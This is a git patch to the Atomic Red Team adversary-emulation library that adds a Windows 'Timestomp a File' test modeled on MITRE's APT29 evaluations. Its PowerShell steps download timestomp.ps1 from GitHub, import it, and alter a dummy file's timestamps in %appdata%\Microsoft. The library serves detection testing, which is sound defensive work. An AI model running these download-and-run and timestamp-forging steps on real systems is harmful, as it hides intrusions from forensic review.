From 163e84ca30efe419488f887b2fbfaa044cfdf6f1 Mon Sep 17 00:00:00 2001 From: Michael Haag Date: Tue, 28 Apr 2020 11:36:12 -0600 Subject: [PATCH] Update T1099.yaml - Timestomp (#960) * Update T1099.yaml New Timestomp Atomic test added to emulate MITRE ATT&CKs recent APT29 evals. https://attackevals.mitre.org/APT29 * Generate docs from job=validate_atomics_generate_docs branch=T1099Take2 Co-authored-by: CircleCI Atomic Red Team doc generator --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 32 ++++++++++ atomics/T1099/T1099.md | 64 +++++++++++++++++++ atomics/T1099/T1099.yaml | 43 +++++++++++++ 7 files changed, 143 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 6aecd180..883344d1 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -258,6 +258,7 @@ defense-evasion,T1099,Timestomp,4,Modify file timestamps using reference file defense-evasion,T1099,Timestomp,5,Windows - Modify file creation timestamp with PowerShell defense-evasion,T1099,Timestomp,6,Windows - Modify file last modified timestamp with PowerShell defense-evasion,T1099,Timestomp,7,Windows - Modify file last access timestamp with PowerShell +defense-evasion,T1099,Timestomp,8,Windows - Timestomp a File defense-evasion,T1127,Trusted Developer Utilities,1,MSBuild Bypass Using Inline Tasks defense-evasion,T1102,Web Service,1,Reach out to C2 Pointer URLs via command_prompt defense-evasion,T1102,Web Service,2,Reach out to C2 Pointer URLs via powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index f26add6e..924637af 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -116,6 +116,7 @@ defense-evasion,T1216,Signed Script Proxy Execution,3,manage-bde.wsf Signed Scri defense-evasion,T1099,Timestomp,5,Windows - Modify file creation timestamp with PowerShell defense-evasion,T1099,Timestomp,6,Windows - Modify file last modified timestamp with PowerShell defense-evasion,T1099,Timestomp,7,Windows - Modify file last access timestamp with PowerShell +defense-evasion,T1099,Timestomp,8,Windows - Timestomp a File defense-evasion,T1127,Trusted Developer Utilities,1,MSBuild Bypass Using Inline Tasks defense-evasion,T1102,Web Service,1,Reach out to C2 Pointer URLs via command_prompt defense-evasion,T1102,Web Service,2,Reach out to C2 Pointer URLs via powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 466d5c2e..c441755c 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -390,6 +390,7 @@ - Atomic Test #5: Windows - Modify file creation timestamp with PowerShell [windows] - Atomic Test #6: Windows - Modify file last modified timestamp with PowerShell [windows] - Atomic Test #7: Windows - Modify file last access timestamp with PowerShell [windows] + - Atomic Test #8: Windows - Timestomp a File [windows] - [T1127 Trusted Developer Utilities](../../T1127/T1127.md) - Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows] - T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index a1256a62..8c51ccab 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -172,6 +172,7 @@ - Atomic Test #5: Windows - Modify file creation timestamp with PowerShell [windows] - Atomic Test #6: Windows - Modify file last modified timestamp with PowerShell [windows] - Atomic Test #7: Windows - Modify file last access timestamp with PowerShell [windows] + - Atomic Test #8: Windows - Timestomp a File [windows] - [T1127 Trusted Developer Utilities](../../T1127/T1127.md) - Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows] - T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 4bbcf8c4..602d02b2 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -12852,6 +12852,38 @@ defense-evasion: cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore ' + - name: Windows - Timestomp a File + description: "Timestomp kxwn.lock.\n\nSuccessful execution will include the + placement of kxwn.lock in #{file_path} and execution of timestomp.ps1 to modify + the time of the .lock file. \n\n[Mitre ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/4a2ad84e-a93a-4b2e-b1f0-c354d6a41278.yml)\n" + supported_platforms: + - windows + input_arguments: + file_path: + description: File path for timestomp payload + type: String + default: "$env:appdata\\Microsoft" + dependency_executor_name: powershell + dependencies: + - description: 'timestomp.ps1 must be present in #{file_path}.' + prereq_command: 'if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit + 1}' + get_prereq_command: Invoke-WebRequest "https://raw.githubusercontent.com/mitre-attack/attack-arsenal/bc0ba1d88d026396939b6816de608cb279bfd489/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1" + -OutFile "#{file_path}\timestomp.ps1" + - description: 'kxwn.lock must be present in #{file_path}.' + prereq_command: if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else + {exit 1} + get_prereq_command: 'New-Item -Path #{file_path}\kxwn.lock -ItemType File' + executor: + name: powershell + elevation_required: false + command: "import-module #{file_path}\\timestomp.ps1\ntimestomp -dest \"#{file_path}\\kxwn.lock\"\n + \n" + cleanup_command: |- + Write-Host "Removing #{file_path}\timestomp.ps1" + Remove-Item #{file_path}\timestomp.ps1 -ErrorAction Ignore + Write-Host "Removing #{file_path}\kxwn.lock" + Remove-Item #{file_path}\kxwn.lock -ErrorAction Ignore T1127: technique: x_mitre_data_sources: diff --git a/atomics/T1099/T1099.md b/atomics/T1099/T1099.md index 51d15941..5d8ef076 100644 --- a/atomics/T1099/T1099.md +++ b/atomics/T1099/T1099.md @@ -18,6 +18,8 @@ - [Atomic Test #7 - Windows - Modify file last access timestamp with PowerShell](#atomic-test-7---windows---modify-file-last-access-timestamp-with-powershell) +- [Atomic Test #8 - Windows - Timestomp a File](#atomic-test-8---windows---timestomp-a-file) +
@@ -288,4 +290,66 @@ Set-Content #{file_path} -Value "T1099 Timestomp" -Force | Out-Null +
+
+ +## Atomic Test #8 - Windows - Timestomp a File +Timestomp kxwn.lock. + +Successful execution will include the placement of kxwn.lock in #{file_path} and execution of timestomp.ps1 to modify the time of the .lock file. + +[Mitre ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/4a2ad84e-a93a-4b2e-b1f0-c354d6a41278.yml) + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| file_path | File path for timestomp payload | String | $env:appdata\Microsoft| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +import-module #{file_path}\timestomp.ps1 +timestomp -dest "#{file_path}\kxwn.lock" +``` + +#### Cleanup Commands: +```powershell +Write-Host "Removing #{file_path}\timestomp.ps1" +Remove-Item #{file_path}\timestomp.ps1 -ErrorAction Ignore +Write-Host "Removing #{file_path}\kxwn.lock" +Remove-Item #{file_path}\kxwn.lock -ErrorAction Ignore +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: timestomp.ps1 must be present in #{file_path}. +##### Check Prereq Commands: +```powershell +if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Invoke-WebRequest "https://raw.githubusercontent.com/mitre-attack/attack-arsenal/bc0ba1d88d026396939b6816de608cb279bfd489/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1" -OutFile "#{file_path}\timestomp.ps1" +``` +##### Description: kxwn.lock must be present in #{file_path}. +##### Check Prereq Commands: +```powershell +if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +New-Item -Path #{file_path}\kxwn.lock -ItemType File +``` + + + +
diff --git a/atomics/T1099/T1099.yaml b/atomics/T1099/T1099.yaml index 5203c215..17b716a3 100644 --- a/atomics/T1099/T1099.yaml +++ b/atomics/T1099/T1099.yaml @@ -188,3 +188,46 @@ atomic_tests: Get-ChildItem #{file_path} | % { $_.LastAccessTime = "#{target_date_time}" } cleanup_command: | Remove-Item #{file_path} -Force -ErrorAction Ignore + +- name: Windows - Timestomp a File + description: | + Timestomp kxwn.lock. + + Successful execution will include the placement of kxwn.lock in #{file_path} and execution of timestomp.ps1 to modify the time of the .lock file. + + [Mitre ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/4a2ad84e-a93a-4b2e-b1f0-c354d6a41278.yml) + supported_platforms: + - windows + input_arguments: + file_path: + description: File path for timestomp payload + type: String + default: $env:appdata\Microsoft + + dependency_executor_name: powershell + dependencies: + - description: | + timestomp.ps1 must be present in #{file_path}. + prereq_command: | + if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest "https://raw.githubusercontent.com/mitre-attack/attack-arsenal/bc0ba1d88d026396939b6816de608cb279bfd489/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1" -OutFile "#{file_path}\timestomp.ps1" + - description: | + kxwn.lock must be present in #{file_path}. + prereq_command: | + if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Path #{file_path}\kxwn.lock -ItemType File + + executor: + name: powershell + elevation_required: false + command: | + import-module #{file_path}\timestomp.ps1 + timestomp -dest "#{file_path}\kxwn.lock" + + cleanup_command: | + Write-Host "Removing #{file_path}\timestomp.ps1" + Remove-Item #{file_path}\timestomp.ps1 -ErrorAction Ignore + Write-Host "Removing #{file_path}\kxwn.lock" + Remove-Item #{file_path}\kxwn.lock -ErrorAction Ignore \ No newline at end of file